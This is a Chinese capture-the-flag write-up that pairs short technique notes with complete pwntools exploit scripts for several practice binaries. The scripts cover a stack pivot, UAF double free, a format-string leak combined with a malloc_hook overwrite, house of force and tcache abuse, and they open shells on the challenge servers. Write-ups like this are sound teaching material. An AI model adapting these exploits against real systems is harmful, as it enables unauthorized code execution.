1.Brrow Stack

  • 就是个64位的栈转移,前面做过也有不少64位栈转移的题目了,这里就说说32位和64位的区别吧。32位下栈转移网上教程很多,无脑转就行。64位的话往main上面跳时会因为环境变量的而crash掉。所以一般进行再次转移,一般在栈上有大约0x200字节的空白空间,则执行system函数就不会报错。而我一般用的是one_gadget。
#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('123.56.85.29',3635)
else:
	io=process('./borrowstack')
elf=ELF('./borrowstack')
pop_rdi=0x0000000000400703
leave_ret=0x0000000000400699
bss_addr=0x601080
puts_plt=0x4004e0
puts_got=elf.got['puts']
read_addr=0x400680

def leak():
	payload ='a'*0x60+p64(bss_addr+0x50)+p64(leave_ret)
	io.sendafter('want\n',payload)
	payload ='a'*0x50
	payload+=p64(bss_addr)#0x6010d0
	payload+=p64(pop_rdi) #0x6010d8
	payload+=p64(puts_got)#0x6010e0
	payload+=p64(puts_plt)#0x6010e8
	payload+=p64(read_addr)#0x6010f0
	
	io.sendafter('now!\n',payload)
	puts_leak=u64(io.recv(6).ljust(8,'\x00'))
	log.success('puts_leak==>{}'.format(hex(puts_leak)))
	return puts_leak
	
def pwn(leak):
	libc=LibcSearcher('puts',leak)
	libc_base=leak-libc.dump('puts')
	log.success('libc_base==>{}'.format(hex(libc_base)))
	payload ='a'*8#0x6010f8
	payload+=p64(libc_base+0xf1147 )
	io.sendline(payload)
	io.interactive()
if __name__=='__main__':
	leak=leak()
	pwn(leak)

2.Some_thing_exceting

  • 这题比较简单,漏洞是UAF,可以用double free来把堆申请到flag被读取的位置,然后show一下就行。
#!/usr/bin/python
#coding:utf-8
#flag{b3eeaf75-fea6-4b77-ae9e-6027f1a83c0a}
from pwn import *
from LibcSearcher import *
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
if args.Q:
	io=remote('123.56.85.29',6484)
else:
	io=process('./excited')

def create(ba_length,ba_content,na_length,na_content):
	io.sendlineafter('do :','1')
	io.sendlineafter('length : ',str(ba_length))
	io.sendafter('ba : ',ba_content)
	io.sendlineafter('length : ',str(na_length))
	io.sendafter('na : ',na_content)
def delete(ID):
	io.sendlineafter('do :','3')
	io.sendlineafter('ID : ',str(ID))
	
def show(ID):	
	io.sendlineafter('do :','4')
	io.sendlineafter('ID : ',str(ID))
	
def pwn():
	create(0x50,'aa',0x50,'aa')#0(0,*0)
	create(0x50,'bb',0x20,'aa')#1(0,*0)
	delete(0)
	delete(1)
	delete(0)
	
	create(0x50,p64(0x602098),0x50,'aa')#2=0
	create(0x50,' ',0x50,'f')#3=1
	#gdb.attach(io,'b *0x0x400a08')
	show(3)	
	io.interactive()
if __name__=='__main__':
	pwn()
	

3.Some_thing_exceted

  • 这题稍微比上面的难一点。有fmt漏洞可以用来得到libc然后也是UAF漏洞打malloc_hook。
#!/usr/bin/python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('123.56.85.29',3041)
else:
	io=process('./interested')
	
def add(O_length,O_content,re_length,re_content):
	io.sendlineafter('do :','1')
	io.sendlineafter('length : ',str(O_length))
	io.sendafter('O : ',O_content)
	io.sendlineafter('length : ',str(re_length))
	io.sendafter('RE : ',O_content)
def edit(ID,O_content,RE_content):
	io.sendlineafter('do :','2')
	io.sendlineafter('Oreo ID : ',str(ID))
	io.sendafter('O : ',O_content)
	io.sendafter('RE : ',RE_content)
def delete(ID):
	io.sendlineafter('do :','3')
	io.sendlineafter('Oreo ID : ',str(ID))
def show(ID):
	io.sendlineafter('do :','4')
	io.sendlineafter('Oreo ID : ',str(ID))


def format_leak(i):
	payload ='OreOOrereOOreO'+'%'+str(i)+'$p'
	io.sendlineafter('please:',payload)
	io.sendlineafter('do :','0')
	io.recvuntil('Now you are ....?\n')
	io.recvuntil('# Your Code is OreOOrereOOreO')
	libc_start_main_leak=int(io.recv(14),16)-240
	log.success('libc_start_main==>{}'.format(hex(libc_start_main_leak)))
	return libc_start_main_leak
def pwn(leak):
	libc=LibcSearcher('__libc_start_main',leak)
	libc_base=leak-libc.dump('__libc_start_main')
	one_gadget=libc_base+0xf1147
	malloc_hook=libc_base+libc.dump('__malloc_hook')
	fake_chunk=malloc_hook-35
	log.success('libc_base==>{}'.format(hex(libc_base)))
	log.success('one_gadget==>{}'.format(hex(one_gadget)))
	log.success('malloc_hook==>{}'.format(hex(malloc_hook)))
	log.success('fake_chunk==>{}'.format(hex(fake_chunk)))
	add(0x60,'a',0x10,'a')#1
	delete(1)
	O_content=p64(fake_chunk)
	edit(1,O_content,' ')
	add(0x60,'a',0x10,'a')#1
	payload ='a'*19+p64(one_gadget)
	#gdb.attach(io)
	io.sendlineafter('do :','1')
	io.sendlineafter('length : ',str(0x60))
	io.sendafter('O : ',payload)
	io.sendlineafter('length : ',str(10))
	io.interactive()
	
	
if __name__=='__main__':
	libc_start_main_leak=format_leak(17)#7-->s 6-->start
	pwn(libc_start_main_leak)

4.BFnote

5.document

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',29506)
else:
	io=process('./pwn')

sa = lambda a,b : io.sendafter(a,b) 
sla =lambda a,b : io.sendlineafter(a,b)
ru =lambda a : io.recvuntil(a)
ia=lambda : io.interactive()
ru=lambda a: io.recvuntil(a)

def add(name,information,sex='w'):
	sla('choice :\n','1')
	sa('name\n',name.ljust(8,'\x00'))
	sa('sex\n',sex)
	sa('information\n',information.ljust(0x70,'\x00'))
def show(idx):
	sla('choice :\n','2')
	sla('index :\n',str(idx))
def edit(idx,information,choice='y'):
	sla('choice :\n','3')
	sla('index :\n',str(idx))
	sla('sex?\n',choice)
	sa('information\n',information.ljust(0x70,'\x00'))
def dele(idx):
	sla('choice :\n','4')
	sla('index :\n',str(idx))
def leak():
	add('caonima',information='a')#0
	add('/bin/sh\x00',information='a')#1
	dele(0)
	show(0)
	leak=u64(ru('\x7f')[-6:].ljust(8,'\x00'))
	log.success('leak==>{}'.format(hex(leak)))
	return leak
def pwn(leak):
	malloc_hook=leak-0x68
	libc=LibcSearcher('__malloc_hook',malloc_hook)
	libc_base=malloc_hook-libc.dump('__malloc_hook')
	system_addr=libc_base+libc.dump('system')
	free_hook=libc_base+libc.dump('__free_hook')
	log.success('libc_base==>{}'.format(hex(libc_base)))
	log.success('system_addr==>{}'.format(hex(system_addr)))
	log.success('free_hook==>{}'.format(hex(free_hook)))
	add('rininai',information='a')#3
	add('niyede','a')#4
	edit(0,p64(0)+p64(0x21)+p64(free_hook-0x10)+p64(1))
	edit(3,p64(system_addr))
	#gdb.attach(io,'b free')
	#pause
	dele(1)
	ia()
	
if __name__=='__main__':
	leak=leak()
	pwn(leak)

6.Force

  • hof
#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',26492)
else:
	io=process('./gyctf_2020_force')
	
sla=lambda a,b:io.sendlineafter(a,b)
sa=lambda a,b:io.sendafter(a,b)
ia=lambda : io.interactive()
ru=lambda a:io.recvuntil(a)
rv=lambda a:io.recv(a)
def add(size,content,debug=0):
	sla('2:puts\n','1')
	sla('size\n',str(size))
	if debug==1:
		ru('bin addr ')
		leak=int(rv(14),16)
		log.success('leak==>{}'.format(hex(leak)))
		sa('content\n',content)
		return leak
	else:
		sa('content\n',content)
def pwn():
	payload='a'
	leak=add(0x200000,payload,1)
	malloc_hook=leak+0x5c5b00
	log.success('malloc_hook==>{}'.format(hex(malloc_hook)))
	libc=LibcSearcher('__malloc_hook',malloc_hook)
	libc_base=malloc_hook-libc.dump('__malloc_hook')
	system_addr=libc_base+libc.dump('system')
	binsh_addr=libc_base+libc.dump('str_bin_sh')
	log.success('libc_base==>{}'.format(hex(libc_base)))
	log.success('system_addr==>{}'.format(hex(system_addr)))
	log.success('binsh_addr==>{}'.format(hex(binsh_addr)))
	payload='a'*0x10+p64(0)+p64(0xffffffffffffffff)
	top_chunk=add(0x10,payload,1)+0x20
	log.success('top_chunk==>{}'.format(hex(top_chunk)))
	add(malloc_hook-0x10-top_chunk,'a')
	add(0x20,p64(system_addr)*4)
	sla('2:puts\n','1')
	sla('size\n',str(binsh_addr))
	ia()	
if __name__=='__main__':
	pwn()

7.signin

  • 高版本libc,利用当申请fastbin堆块时,若tcache未满时,把fastbin里面剩余堆块放进去。
#!/usr/bin/python
#coding:utf-8
from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('123.56.85.29',4205)
else:
	io=process(['./pwn'])
	
	
def add(idx):
	io.sendlineafter('choice?','1')
	io.sendlineafter('idx?\n',str(idx))
def edit(idx,content):
	io.sendlineafter('choice?','2')
	io.sendlineafter('idx?\n',str(idx))
	io.sendline(content)
def dele(idx):
	io.sendlineafter('choice?','3')
	io.sendlineafter('idx?\n',str(idx))
def backdoor():
	io.sendlineafter('choice?','6')
	
def pwn():
	for i in range(0,8):
		add(i)
	for i in range(0,8):
		dele(i)
	#	fill full of tcache
	edit(7,p64(0x4040a8))
	add(1)
	gdb.attach(io)
	pause()
	backdoor()
	io.interactive()
	

	
if __name__=='__main__':
	pwn()